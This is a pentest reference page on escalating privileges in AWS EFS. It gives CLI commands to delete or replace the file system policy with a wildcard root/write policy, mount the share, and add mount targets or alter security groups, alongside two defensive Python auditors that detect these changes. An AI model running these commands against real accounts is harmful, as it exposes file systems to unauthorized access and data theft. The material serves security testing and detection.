AWS - EFS Privesc


EFS

More information about EFS can be found in:

AWS - EFS Enum

Note that to mount an EFS you need to be in a subnet where the EFS is exposed (it has a mount target there) and have network access to it (security groups). If that is the case, you will be able to mount it by default; however, if the file system is protected by an IAM file system policy, you need the additional permissions listed below to access it.

elasticfilesystem:DeleteFileSystemPolicy|elasticfilesystem:PutFileSystemPolicy

With either of these permissions, an attacker can modify the file system policy to grant themselves access, or simply delete it so that the default access (anyone who can reach a mount target) is granted.

To delete the policy:

```bash
aws efs delete-file-system-policy \
--file-system-id <value>
```

To modify it:

```bash
# Give everyone trying to mount it read, write and root access
aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json
```

policy.json:

```json
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}
```
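The policy above is exactly the kind of change a defender wants to catch: a wildcard principal granted ClientRootAccess and ClientWrite, gated only by `elasticfilesystem:AccessedViaMountTarget`, which any host in a subnet with a mount target satisfies. The following is an added example, not HackTricks code and not an AWS tool, that parses an EFS file system policy document offline and flags Allow statements whose principal is `*` and whose conditions do not narrow the caller's identity or network origin. The two sample policies are constructed for the example; the set of "narrowing" condition keys is an editor's choice (global IAM condition keys), not a statement about which keys EFS evaluates.

```python
import json

# Constructed sample modelled on the permissive policy shown above:
# wildcard principal, root + write + mount, only gated by AccessedViaMountTarget.
PERMISSIVE_POLICY = """{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "allow-anyone-root",
      "Effect": "Allow",
      "Principal": {"AWS": "*"},
      "Action": [
        "elasticfilesystem:ClientRootAccess",
        "elasticfilesystem:ClientWrite",
        "elasticfilesystem:ClientMount"
      ],
      "Condition": {"Bool": {"elasticfilesystem:AccessedViaMountTarget": "true"}}
    }
  ]
}"""

# Constructed sample of a tighter policy: a single role, mount + write, no root access.
RESTRICTED_POLICY = """{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "app-role-only",
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::111122223333:role/app-role"},
      "Action": ["elasticfilesystem:ClientMount", "elasticfilesystem:ClientWrite"],
      "Condition": {"Bool": {"aws:SecureTransport": "true"}}
    }
  ]
}"""

# Actions that go beyond read-only access once the file system is mounted.
PRIVILEGED_ACTIONS = {"elasticfilesystem:ClientRootAccess", "elasticfilesystem:ClientWrite"}

# Global condition keys that actually narrow *who* or *from where* (assumption / editor's choice).
# AccessedViaMountTarget is deliberately not in this set: it only says the request
# came through a mount target, which every host in that subnet can do.
IDENTITY_NARROWING_KEYS = {
    "aws:PrincipalArn", "aws:PrincipalAccount", "aws:PrincipalOrgID",
    "aws:SourceVpc", "aws:SourceVpce",
}


def _as_list(value):
    """IAM allows scalars or lists in most fields; normalise to a list."""
    return value if isinstance(value, list) else [value]


def principal_is_wildcard(principal):
    """True for Principal "*" or {"AWS": "*"} (also inside a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(v == "*" for v in _as_list(principal.get("AWS", [])))
    return False


def condition_keys(condition):
    """Collect every condition key used, regardless of operator (Bool, StringEquals, ...)."""
    keys = set()
    for operator_values in (condition or {}).values():
        keys.update(operator_values.keys())
    return keys


def audit_efs_policy(policy_json):
    """Return findings for Allow statements open to any principal without narrowing conditions."""
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = set(_as_list(stmt.get("Action", [])))
        granted = PRIVILEGED_ACTIONS & actions
        if "*" in actions or "elasticfilesystem:*" in actions:
            granted = granted | {"elasticfilesystem:*"}
        open_principal = principal_is_wildcard(stmt.get("Principal"))
        narrowed = bool(condition_keys(stmt.get("Condition")) & IDENTITY_NARROWING_KEYS)
        if open_principal and not narrowed:
            findings.append({
                "sid": stmt.get("Sid"),
                "issue": "wildcard principal without identity/network-narrowing condition",
                "privileged_actions": sorted(granted),
            })
    return findings


if __name__ == "__main__":
    for name, doc in (("permissive", PERMISSIVE_POLICY), ("restricted", RESTRICTED_POLICY)):
        print(name, audit_efs_policy(doc))
```

Run it against the output of `aws efs describe-file-system-policy` in a review pipeline; an empty policy (the state after `delete-file-system-policy`) should be treated as a finding too, since it falls back to default access. The CloudTrail event names that correspond to the two API calls discussed here, PutFileSystemPolicy and DeleteFileSystemPolicy, are the ones to alert on.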

elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)

With this permission an attacker will be able to mount the EFS. If write permission is not granted by default to everyone who can mount the EFS, they will only get read access.

```bash
# The efs mount type requires the amazon-efs-utils mount helper
sudo mkdir /efs
sudo mount -t efs -o tls,iam <file-system-id/EFS DNS name>:/ /efs/
```

The additional permissions elasticfilesystem:ClientRootAccess and elasticfilesystem:ClientWrite can be used to write inside the file system once mounted and to access that file system as root.

Potential Impact: Indirect privesc by finding sensitive information inside the file system.

elasticfilesystem:CreateMountTarget

If an attacker is inside a subnet where the EFS has no mount target, they can simply create one in their subnet with this permission:

```bash
# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>
```

Potential Impact: Indirect privesc by finding sensitive information inside the file system.

elasticfilesystem:ModifyMountTargetSecurityGroups

In the event that an attacker finds that the EFS has a mount target in their subnet but no security group allows the traffic, they can simply change that by modifying the selected security groups:

```bash
aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>
```

Potential Impact: Indirect privesc by finding sensitive information inside the file system.
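Both CreateMountTarget and ModifyMountTargetSecurityGroups change the network path to the file system rather than its policy, so the defensive check is a drift check: compare the live mount targets and their security groups against a known-good baseline and flag any security group that allows NFS (TCP 2049) from anywhere. The following is an added example, not HackTricks code and not an AWS-provided tool. The records are constructed and only loosely follow the field names of `aws efs describe-mount-targets` and `aws ec2 describe-security-groups` (which fields are present is an assumption); the baseline is whatever your own inventory says the mount targets should look like.

```python
NFS_PORT = 2049
ANY_V4, ANY_V6 = "0.0.0.0/0", "::/0"

# Constructed sample: two mount targets, one known and tightly scoped, one
# that appeared in a public subnet with an open security group.
MOUNT_TARGETS = [
    {"MountTargetId": "fsmt-aaaa0001", "SubnetId": "subnet-app",
     "SecurityGroups": ["sg-efs-allow-app"]},
    {"MountTargetId": "fsmt-aaaa0002", "SubnetId": "subnet-public",
     "SecurityGroups": ["sg-wide-open"]},
]

# Constructed security groups keyed by id (subset of describe-security-groups fields).
SECURITY_GROUPS = {
    "sg-efs-allow-app": {"IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 2049, "ToPort": 2049,
         "IpRanges": [], "UserIdGroupPairs": [{"GroupId": "sg-app-servers"}]},
    ]},
    "sg-wide-open": {"IpPermissions": [
        {"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "UserIdGroupPairs": []},
    ]},
}

# Known-good state from your inventory: mount target id -> expected security groups.
BASELINE = {"fsmt-aaaa0001": {"sg-efs-allow-app"}}


def rule_covers_nfs(rule):
    """True if an ingress rule admits TCP 2049 (all-protocol rules count too)."""
    if rule.get("IpProtocol") == "-1":
        return True
    if rule.get("IpProtocol") != "tcp":
        return False
    return rule.get("FromPort", 0) <= NFS_PORT <= rule.get("ToPort", 0)


def open_nfs_sources(sg):
    """CIDRs that may reach NFS on this group from anywhere (IPv4 or IPv6)."""
    sources = []
    for rule in sg.get("IpPermissions", []):
        if not rule_covers_nfs(rule):
            continue
        for r in rule.get("IpRanges", []):
            if r.get("CidrIp") == ANY_V4:
                sources.append(ANY_V4)
        for r in rule.get("Ipv6Ranges", []):
            if r.get("CidrIpv6") == ANY_V6:
                sources.append(ANY_V6)
    return sources


def audit_mount_targets(mount_targets, security_groups, baseline):
    """Return (mount_target_id, finding) pairs for drift and world-reachable NFS."""
    findings = []
    for mt in mount_targets:
        mt_id = mt["MountTargetId"]
        attached = set(mt.get("SecurityGroups", []))
        if mt_id not in baseline:
            findings.append((mt_id, "mount target not in baseline (possible CreateMountTarget)"))
        elif attached != baseline[mt_id]:
            findings.append((mt_id, "security groups differ from baseline "
                                    "(possible ModifyMountTargetSecurityGroups)"))
        for sg_id in sorted(attached):
            for src in open_nfs_sources(security_groups.get(sg_id, {})):
                findings.append((mt_id, f"{sg_id} allows NFS/{NFS_PORT} from {src}"))
    return findings


if __name__ == "__main__":
    for mt_id, finding in audit_mount_targets(MOUNT_TARGETS, SECURITY_GROUPS, BASELINE):
        print(mt_id, finding)
```

Feed it the real API output and run it on a schedule, or trigger it from the CloudTrail events for the two API calls named in this section (CreateMountTarget and ModifyMountTargetSecurityGroups); a mount target that is absent from the baseline is worth an alert even when its security group looks tight, since the baseline is the only thing that distinguishes a planned change from an attacker's.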
